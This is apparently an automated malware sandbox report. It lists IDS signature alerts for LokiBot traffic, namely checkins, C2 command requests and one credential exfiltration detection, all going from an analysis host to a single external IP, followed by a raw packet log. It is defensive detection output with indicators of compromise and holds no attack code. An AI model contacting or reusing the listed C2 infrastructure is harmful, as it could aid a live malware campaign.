                                                                              04/18/24-21:15:57.883313TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977180192.168.2.524.199.107.111
                                                                              04/18/24-21:15:31.417776TCP2025381ET TROJAN LokiBot Checkin4975180192.168.2.524.199.107.111
                                                                              04/18/24-21:15:27.574110TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974880192.168.2.524.199.107.111
                                                                              04/18/24-21:15:50.128905TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976580192.168.2.524.199.107.111
                                                                              04/18/24-21:15:27.574110TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974880192.168.2.524.199.107.111
                                                                              04/18/24-21:16:05.710998TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977780192.168.2.524.199.107.111
                                                                              04/18/24-21:15:19.900785TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974280192.168.2.524.199.107.111
                                                                              04/18/24-21:15:43.577757TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976080192.168.2.524.199.107.111
                                                                              04/18/24-21:15:38.343274TCP2025381ET TROJAN LokiBot Checkin4975680192.168.2.524.199.107.111
                                                                              04/18/24-21:15:31.417776TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975180192.168.2.524.199.107.111
                                                                              04/18/24-21:15:43.577757TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976080192.168.2.524.199.107.111
                                                                              04/18/24-21:15:55.291838TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.524.199.107.111
                                                                              04/18/24-21:15:52.727351TCP2025381ET TROJAN LokiBot Checkin4976780192.168.2.524.199.107.111
                                                                              04/18/24-21:14:55.405038TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972080192.168.2.524.199.107.111
                                                                              04/18/24-21:14:58.054488TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972380192.168.2.524.199.107.111
                                                                              04/18/24-21:15:00.650946TCP2025381ET TROJAN LokiBot Checkin4972580192.168.2.524.199.107.111
                                                                              04/18/24-21:15:12.336916TCP2025381ET TROJAN LokiBot Checkin4973480192.168.2.524.199.107.111
                                                                              04/18/24-21:16:06.993244TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977880192.168.2.524.199.107.111
                                                                              04/18/24-21:15:09.740290TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973280192.168.2.524.199.107.111
                                                                              04/18/24-21:14:58.054488TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972380192.168.2.524.199.107.111
                                                                              04/18/24-21:15:09.740290TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973280192.168.2.524.199.107.111
                                                                              04/18/24-21:15:56.584321TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977080192.168.2.524.199.107.111
                                                                              04/18/24-21:15:27.574110TCP2025381ET TROJAN LokiBot Checkin4974880192.168.2.524.199.107.111
                                                                              04/18/24-21:15:11.056904TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973380192.168.2.524.199.107.111
                                                                              04/18/24-21:16:01.755192TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.524.199.107.111
                                                                              04/18/24-21:16:04.366648TCP2025381ET TROJAN LokiBot Checkin4977680192.168.2.524.199.107.111
                                                                              04/18/24-21:15:18.646857TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973980192.168.2.524.199.107.111
                                                                              04/18/24-21:15:46.232170TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976280192.168.2.524.199.107.111
                                                                              04/18/24-21:15:13.616364TCP2025381ET TROJAN LokiBot Checkin4973580192.168.2.524.199.107.111
                                                                              04/18/24-21:15:18.646857TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973980192.168.2.524.199.107.111
                                                                              04/18/24-21:16:01.755192TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977480192.168.2.524.199.107.111
                                                                              04/18/24-21:15:31.417776TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975180192.168.2.524.199.107.111
                                                                              04/18/24-21:15:33.969601TCP2025381ET TROJAN LokiBot Checkin4975380192.168.2.524.199.107.111
                                                                              04/18/24-21:15:11.056904TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973380192.168.2.524.199.107.111
                                                                              04/18/24-21:15:54.038795TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976880192.168.2.524.199.107.111
                                                                              04/18/24-21:15:03.295987TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972780192.168.2.524.199.107.111
                                                                              04/18/24-21:16:11.036801TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978080192.168.2.524.199.107.111
                                                                              04/18/24-21:15:59.169571TCP2025381ET TROJAN LokiBot Checkin4977280192.168.2.524.199.107.111
                                                                              04/18/24-21:15:16.137495TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973780192.168.2.524.199.107.111
                                                                              04/18/24-21:15:05.927820TCP2025381ET TROJAN LokiBot Checkin4972980192.168.2.524.199.107.111
                                                                              04/18/24-21:15:21.167396TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.524.199.107.111
                                                                              04/18/24-21:15:47.546903TCP2025381ET TROJAN LokiBot Checkin4976380192.168.2.524.199.107.111
                                                                              04/18/24-21:15:32.674567TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.524.199.107.111
                                                                              04/18/24-21:15:40.987319TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975880192.168.2.524.199.107.111
                                                                              04/18/24-21:15:37.064330TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975580192.168.2.524.199.107.111
                                                                              04/18/24-21:15:39.649079TCP2025381ET TROJAN LokiBot Checkin4975780192.168.2.524.199.107.111
                                                                              04/18/24-21:15:24.990290TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974680192.168.2.524.199.107.111
                                                                              04/18/24-21:15:48.869530TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976480192.168.2.524.199.107.111
                                                                              04/18/24-21:15:51.436031TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.524.199.107.111
                                                                              04/18/24-21:15:28.852627TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.524.199.107.111
                                                                              04/18/24-21:15:44.926071TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976180192.168.2.524.199.107.111
                                                                              04/18/24-21:15:40.987319TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975880192.168.2.524.199.107.111
                                                                              04/18/24-21:15:48.869530TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976480192.168.2.524.199.107.111
                                                                              04/18/24-21:15:56.584321TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977080192.168.2.524.199.107.111
                                                                              04/18/24-21:15:28.852627TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974980192.168.2.524.199.107.111
                                                                              04/18/24-21:15:37.064330TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975580192.168.2.524.199.107.111
                                                                              04/18/24-21:14:52.788914TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971880192.168.2.524.199.107.111
                                                                              04/18/24-21:14:59.337353TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972480192.168.2.524.199.107.111
                                                                              04/18/24-21:15:44.926071TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976180192.168.2.524.199.107.111
                                                                              04/18/24-21:15:30.148760TCP2025381ET TROJAN LokiBot Checkin4975080192.168.2.524.199.107.111
                                                                              04/18/24-21:15:14.853773TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973680192.168.2.524.199.107.111
                                                                              04/18/24-21:16:05.710998TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977780192.168.2.524.199.107.111
                                                                              04/18/24-21:16:08.287618TCP2025381ET TROJAN LokiBot Checkin4977980192.168.2.524.199.107.111
                                                                              04/18/24-21:15:17.411805TCP2025381ET TROJAN LokiBot Checkin4973880192.168.2.524.199.107.111
                                                                              04/18/24-21:15:07.211883TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973080192.168.2.524.199.107.111
                                                                              04/18/24-21:15:50.128905TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.524.199.107.111
                                                                              04/18/24-21:15:57.883313TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977180192.168.2.524.199.107.111
                                                                              04/18/24-21:15:22.462652TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.524.199.107.111
                                                                              04/18/24-21:15:19.900785TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974280192.168.2.524.199.107.111
                                                                              04/18/24-21:15:42.247156TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975980192.168.2.524.199.107.111
                                                                              04/18/24-21:16:05.710998TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977780192.168.2.524.199.107.111
                                                                              04/18/24-21:15:14.853773TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973680192.168.2.524.199.107.111
                                                                              04/18/24-21:15:19.900785TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974280192.168.2.524.199.107.111
                                                                              04/18/24-21:15:35.272659TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975480192.168.2.524.199.107.111
                                                                              04/18/24-21:15:37.064330TCP2025381ET TROJAN LokiBot Checkin4975580192.168.2.524.199.107.111
                                                                              04/18/24-21:15:35.272659TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975480192.168.2.524.199.107.111
                                                                              04/18/24-21:15:55.291838TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976980192.168.2.524.199.107.111
                                                                              04/18/24-21:15:59.169571TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977280192.168.2.524.199.107.111
                                                                              04/18/24-21:15:55.291838TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976980192.168.2.524.199.107.111
                                                                              04/18/24-21:15:27.574110TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974880192.168.2.524.199.107.111
                                                                              04/18/24-21:15:51.436031TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.524.199.107.111
                                                                              04/18/24-21:14:58.054488TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972380192.168.2.524.199.107.111
                                                                              04/18/24-21:14:56.706824TCP2025381ET TROJAN LokiBot Checkin4972280192.168.2.524.199.107.111
                                                                              04/18/24-21:15:01.992569TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972680192.168.2.524.199.107.111
                                                                              04/18/24-21:14:54.064385TCP2025381ET TROJAN LokiBot Checkin4971980192.168.2.524.199.107.111
                                                                              04/18/24-21:15:16.137495TCP2025381ET TROJAN LokiBot Checkin4973780192.168.2.524.199.107.111
                                                                              04/18/24-21:15:01.992569TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972680192.168.2.524.199.107.111
                                                                              04/18/24-21:15:07.211883TCP2025381ET TROJAN LokiBot Checkin4973080192.168.2.524.199.107.111
                                                                              04/18/24-21:15:50.128905TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.524.199.107.111
                                                                              04/18/24-21:16:08.287618TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977980192.168.2.524.199.107.111
                                                                              04/18/24-21:15:22.462652TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974480192.168.2.524.199.107.111
                                                                              04/18/24-21:15:38.343274TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975680192.168.2.524.199.107.111
                                                                              04/18/24-21:15:17.411805TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973880192.168.2.524.199.107.111
                                                                              04/18/24-21:15:46.232170TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976280192.168.2.524.199.107.111
                                                                              04/18/24-21:15:22.462652TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974480192.168.2.524.199.107.111
                                                                              04/18/24-21:16:08.287618TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977980192.168.2.524.199.107.111
                                                                              04/18/24-21:15:11.056904TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973380192.168.2.524.199.107.111
                                                                              04/18/24-21:16:11.036801TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978080192.168.2.524.199.107.111
                                                                              04/18/24-21:16:01.755192TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.524.199.107.111
                                                                              04/18/24-21:15:26.304472TCP2025381ET TROJAN LokiBot Checkin4974780192.168.2.524.199.107.111
                                                                              04/18/24-21:15:31.417776TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975180192.168.2.524.199.107.111
                                                                              04/18/24-21:15:08.492047TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973180192.168.2.524.199.107.111
                                                                              04/18/24-21:16:06.993244TCP2025381ET TROJAN LokiBot Checkin4977880192.168.2.524.199.107.111
                                                                              04/18/24-21:15:04.601915TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972880192.168.2.524.199.107.111
                                                                              04/18/24-21:15:00.650946TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972580192.168.2.524.199.107.111
                                                                              04/18/24-21:15:09.740290TCP2025381ET TROJAN LokiBot Checkin4973280192.168.2.524.199.107.111
                                                                              04/18/24-21:15:43.577757TCP2025381ET TROJAN LokiBot Checkin4976080192.168.2.524.199.107.111
                                                                              04/18/24-21:14:51.563444TCP2025381ET TROJAN LokiBot Checkin4971780192.168.2.524.199.107.111
                                                                              04/18/24-21:15:46.232170TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976280192.168.2.524.199.107.111
                                                                              04/18/24-21:15:32.674567TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975280192.168.2.524.199.107.111
                                                                              04/18/24-21:15:32.674567TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975280192.168.2.524.199.107.111
                                                                              04/18/24-21:15:40.987319TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975880192.168.2.524.199.107.111
                                                                              04/18/24-21:15:52.727351TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976780192.168.2.524.199.107.111
                                                                              04/18/24-21:15:24.990290TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974680192.168.2.524.199.107.111
                                                                              04/18/24-21:15:24.990290TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974680192.168.2.524.199.107.111
                                                                              04/18/24-21:15:48.869530TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976480192.168.2.524.199.107.111
                                                                              04/18/24-21:15:44.926071TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976180192.168.2.524.199.107.111
                                                                              04/18/24-21:15:52.727351TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976780192.168.2.524.199.107.111
                                                                              04/18/24-21:16:03.069976TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.524.199.107.111
                                                                              04/18/24-21:15:18.646857TCP2025381ET TROJAN LokiBot Checkin4973980192.168.2.524.199.107.111
                                                                              04/18/24-21:14:59.337353TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972480192.168.2.524.199.107.111
                                                                              04/18/24-21:14:52.788914TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24971880192.168.2.524.199.107.111
                                                                              04/18/24-21:15:23.725040TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.524.199.107.111
                                                                              04/18/24-21:14:59.337353TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972480192.168.2.524.199.107.111
                                                                              04/18/24-21:15:33.969601TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975380192.168.2.524.199.107.111
                                                                              04/18/24-21:16:00.483740TCP2025381ET TROJAN LokiBot Checkin4977380192.168.2.524.199.107.111
                                                                              04/18/24-21:15:14.853773TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973680192.168.2.524.199.107.111
                                                                              04/18/24-21:15:42.247156TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975980192.168.2.524.199.107.111
                                                                              04/18/24-21:14:52.788914TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14971880192.168.2.524.199.107.111
                                                                              04/18/24-21:15:42.247156TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975980192.168.2.524.199.107.111
                                                                              04/18/24-21:15:51.436031TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.524.199.107.111
                                                                              04/18/24-21:15:39.649079TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975780192.168.2.524.199.107.111
                                                                              04/18/24-21:15:28.852627TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.524.199.107.111
                                                                              04/18/24-21:15:47.546903TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976380192.168.2.524.199.107.111
                                                                              04/18/24-21:15:35.272659TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975480192.168.2.524.199.107.111
                                                                              04/18/24-21:15:59.169571TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977280192.168.2.524.199.107.111
                                                                              04/18/24-21:15:51.436031TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976680192.168.2.524.199.107.111
                                                                              04/18/24-21:16:03.069976TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.524.199.107.111
                                                                              04/18/24-21:16:03.069976TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977580192.168.2.524.199.107.111
                                                                              04/18/24-21:15:39.649079TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975780192.168.2.524.199.107.111
                                                                              04/18/24-21:15:40.987319TCP2025381ET TROJAN LokiBot Checkin4975880192.168.2.524.199.107.111
                                                                              04/18/24-21:15:05.927820TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972980192.168.2.524.199.107.111
                                                                              04/18/24-21:14:51.563444TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971780192.168.2.524.199.107.111
                                                                              04/18/24-21:15:05.927820TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972980192.168.2.524.199.107.111
                                                                              04/18/24-21:15:01.992569TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972680192.168.2.524.199.107.111
                                                                              04/18/24-21:15:56.584321TCP2025381ET TROJAN LokiBot Checkin4977080192.168.2.524.199.107.111
                                                                              04/18/24-21:15:44.926071TCP2025381ET TROJAN LokiBot Checkin4976180192.168.2.524.199.107.111
                                                                              04/18/24-21:15:32.674567TCP2025381ET TROJAN LokiBot Checkin4975280192.168.2.524.199.107.111
                                                                              04/18/24-21:15:21.167396TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.524.199.107.111
                                                                              04/18/24-21:16:08.287618TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977980192.168.2.524.199.107.111
                                                                              04/18/24-21:15:22.462652TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.524.199.107.111
                                                                              04/18/24-21:16:00.483740TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.524.199.107.111
                                                                              04/18/24-21:15:38.343274TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975680192.168.2.524.199.107.111
                                                                              04/18/24-21:15:30.148760TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975080192.168.2.524.199.107.111
                                                                              04/18/24-21:15:42.247156TCP2025381ET TROJAN LokiBot Checkin4975980192.168.2.524.199.107.111
                                                                              04/18/24-21:15:19.900785TCP2025381ET TROJAN LokiBot Checkin4974280192.168.2.524.199.107.111
                                                                              04/18/24-21:16:05.710998TCP2025381ET TROJAN LokiBot Checkin4977780192.168.2.524.199.107.111
                                                                              04/18/24-21:15:17.411805TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973880192.168.2.524.199.107.111
                                                                              04/18/24-21:15:38.343274TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975680192.168.2.524.199.107.111
                                                                              04/18/24-21:15:17.411805TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973880192.168.2.524.199.107.111
                                                                              04/18/24-21:15:23.725040TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.524.199.107.111
                                                                              04/18/24-21:14:59.337353TCP2025381ET TROJAN LokiBot Checkin4972480192.168.2.524.199.107.111
                                                                              04/18/24-21:15:57.883313TCP2025381ET TROJAN LokiBot Checkin4977180192.168.2.524.199.107.111
                                                                              04/18/24-21:15:08.492047TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973180192.168.2.524.199.107.111
                                                                              04/18/24-21:15:12.336916TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973480192.168.2.524.199.107.111
                                                                              04/18/24-21:15:04.601915TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972880192.168.2.524.199.107.111
                                                                              04/18/24-21:14:55.405038TCP2025381ET TROJAN LokiBot Checkin4972080192.168.2.524.199.107.111
                                                                              04/18/24-21:15:00.650946TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972580192.168.2.524.199.107.111
                                                                              04/18/24-21:14:56.706824TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972280192.168.2.524.199.107.111
                                                                              04/18/24-21:15:04.601915TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972880192.168.2.524.199.107.111
                                                                              04/18/24-21:15:08.492047TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973180192.168.2.524.199.107.111
                                                                              04/18/24-21:15:12.336916TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973480192.168.2.524.199.107.111
                                                                              04/18/24-21:15:00.650946TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972580192.168.2.524.199.107.111
                                                                              04/18/24-21:14:54.064385TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971980192.168.2.524.199.107.111
                                                                              04/18/24-21:14:54.064385TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971980192.168.2.524.199.107.111
                                                                              04/18/24-21:15:30.148760TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975080192.168.2.524.199.107.111
                                                                              04/18/24-21:15:11.056904TCP2025381ET TROJAN LokiBot Checkin4973380192.168.2.524.199.107.111
                                                                              04/18/24-21:15:54.038795TCP2025381ET TROJAN LokiBot Checkin4976880192.168.2.524.199.107.111
                                                                              04/18/24-21:15:26.304472TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974780192.168.2.524.199.107.111
                                                                              04/18/24-21:16:04.366648TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977680192.168.2.524.199.107.111
                                                                              04/18/24-21:15:03.295987TCP2025381ET TROJAN LokiBot Checkin4972780192.168.2.524.199.107.111
                                                                              04/18/24-21:15:13.616364TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973580192.168.2.524.199.107.111
                                                                              04/18/24-21:15:33.969601TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975380192.168.2.524.199.107.111
                                                                              04/18/24-21:15:05.927820TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972980192.168.2.524.199.107.111
                                                                              04/18/24-21:15:26.304472TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974780192.168.2.524.199.107.111
                                                                              04/18/24-21:15:33.969601TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975380192.168.2.524.199.107.111
                                                                              04/18/24-21:15:59.169571TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977280192.168.2.524.199.107.111
                                                                              04/18/24-21:16:01.755192TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.524.199.107.111
                                                                              04/18/24-21:16:11.036801TCP2025381ET TROJAN LokiBot Checkin4978080192.168.2.524.199.107.111
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Apr 18, 2024 21:14:06.815097094 CEST49705443192.168.2.5173.194.219.138
                                                                              Apr 18, 2024 21:14:06.815140963 CEST44349705173.194.219.138192.168.2.5
                                                                              Apr 18, 2024 21:14:06.815270901 CEST49705443192.168.2.5173.194.219.138
                                                                              Apr 18, 2024 21:14:06.825871944 CEST49705443192.168.2.5173.194.219.138
                                                                              Apr 18, 2024 21:14:06.825891972 CEST44349705173.194.219.138192.168.2.5
                                                                              Apr 18, 2024 21:14:07.048346996 CEST44349705173.194.219.138192.168.2.5
                                                                              Apr 18, 2024 21:14:07.048507929 CEST49705443192.168.2.5173.194.219.138
                                                                              Apr 18, 2024 21:14:07.049524069 CEST44349705173.194.219.138192.168.2.5
                                                                              Apr 18, 2024 21:14:07.049595118 CEST49705443192.168.2.5173.194.219.138
                                                                              Apr 18, 2024 21:14:07.054068089 CEST49705443192.168.2.5173.194.219.138
                                                                              Apr 18, 2024 21:14:07.054078102 CEST44349705173.194.219.138192.168.2.5
                                                                              Apr 18, 2024 21:14:07.054532051 CEST44349705173.194.219.138192.168.2.5
                                                                              Apr 18, 2024 21:14:07.065835953 CEST49705443192.168.2.5173.194.219.138
                                                                              Apr 18, 2024 21:14:07.108159065 CEST44349705173.194.219.138192.168.2.5
                                                                              Apr 18, 2024 21:14:07.277137995 CEST44349705173.194.219.138192.168.2.5
                                                                              Apr 18, 2024 21:14:07.277220964 CEST44349705173.194.219.138192.168.2.5
                                                                              Apr 18, 2024 21:14:07.277442932 CEST49705443192.168.2.5173.194.219.138
                                                                              Apr 18, 2024 21:14:07.280317068 CEST49705443192.168.2.5173.194.219.138
                                                                              Apr 18, 2024 21:14:07.393644094 CEST49706443192.168.2.5173.194.219.132
                                                                              Apr 18, 2024 21:14:07.393702984 CEST44349706173.194.219.132192.168.2.5
                                                                              Apr 18, 2024 21:14:07.393771887 CEST49706443192.168.2.5173.194.219.132
                                                                              Apr 18, 2024 21:14:07.394153118 CEST49706443192.168.2.5173.194.219.132
                                                                              Apr 18, 2024 21:14:07.394166946 CEST44349706173.194.219.132192.168.2.5
                                                                              Apr 18, 2024 21:14:07.638360023 CEST44349706173.194.219.132192.168.2.5
                                                                              Apr 18, 2024 21:14:07.638531923 CEST49706443192.168.2.5173.194.219.132
                                                                              Apr 18, 2024 21:14:07.653127909 CEST49706443192.168.2.5173.194.219.132
                                                                              Apr 18, 2024 21:14:07.653155088 CEST44349706173.194.219.132192.168.2.5
                                                                              Apr 18, 2024 21:14:07.653527021 CEST44349706173.194.219.132192.168.2.5
                                                                              Apr 18, 2024 21:14:07.654469967 CEST49706443192.168.2.5173.194.219.132
                                                                              Apr 18, 2024 21:14:07.696131945 CEST44349706173.194.219.132192.168.2.5
                                                                              Apr 18, 2024 21:14:08.885919094 CEST44349706173.194.219.132192.168.2.5
                                                                              Apr 18, 2024 21:14:08.886084080 CEST49706443192.168.2.5173.194.219.132
                                                                              Apr 18, 2024 21:14:08.893971920 CEST44349706173.194.219.132192.168.2.5
                                                                              Apr 18, 2024 21:14:08.894079924 CEST49706443192.168.2.5173.194.219.132
                                                                              Apr 18, 2024 21:14:08.910569906 CEST44349706173.194.219.132192.168.2.5
                                                                              Apr 18, 2024 21:14:08.910710096 CEST49706443192.168.2.5173.194.219.132
                                                                              Apr 18, 2024 21:14:08.918828011 CEST44349706173.194.219.132192.168.2.5
                                                                              Apr 18, 2024 21:14:08.964922905 CEST49706443192.168.2.5173.194.219.132
                                                                              Apr 18, 2024 21:14:08.964939117 CEST44349706173.194.219.132192.168.2.5
                                                                              Apr 18, 2024 21:14:09.002213001 CEST44349706173.194.219.132192.168.2.5
                                                                              Apr 18, 2024 21:14:09.002379894 CEST49706443192.168.2.5173.194.219.132
                                                                              Apr 18, 2024 21:14:09.002398968 CEST44349706173.194.219.132192.168.2.5
                                                                              Apr 18, 2024 21:14:09.006131887 CEST44349706173.194.219.132192.168.2.5
                                                                              Apr 18, 2024 21:14:09.006205082 CEST49706443192.168.2.5173.194.219.132
                                                                              Apr 18, 2024 21:14:09.006213903 CEST44349706173.194.219.132192.168.2.5
                                                                              Apr 18, 2024 21:14:09.014452934 CEST44349706173.194.219.132192.168.2.5
                                                                              Apr 18, 2024 21:14:09.014543056 CEST49706443192.168.2.5173.194.219.132
                                                                              Apr 18, 2024 21:14:09.014553070 CEST44349706173.194.219.132192.168.2.5
                                                                              Apr 18, 2024 21:14:09.022819042 CEST44349706173.194.219.132192.168.2.5
                                                                              Apr 18, 2024 21:14:09.022897959 CEST49706443192.168.2.5173.194.219.132
                                                                              Apr 18, 2024 21:14:09.022921085 CEST44349706173.194.219.132192.168.2.5
                                                                              Apr 18, 2024 21:14:09.031250000 CEST44349706173.194.219.132192.168.2.5
                                                                              Apr 18, 2024 21:14:09.031387091 CEST49706443192.168.2.5173.194.219.132
                                                                              Apr 18, 2024 21:14:09.031397104 CEST44349706173.194.219.132192.168.2.5
                                                                              Apr 18, 2024 21:14:09.039627075 CEST44349706173.194.219.132192.168.2.5
                                                                              Apr 18, 2024 21:14:09.039722919 CEST49706443192.168.2.5173.194.219.132
                                                                              Apr 18, 2024 21:14:09.039731979 CEST44349706173.194.219.132192.168.2.5
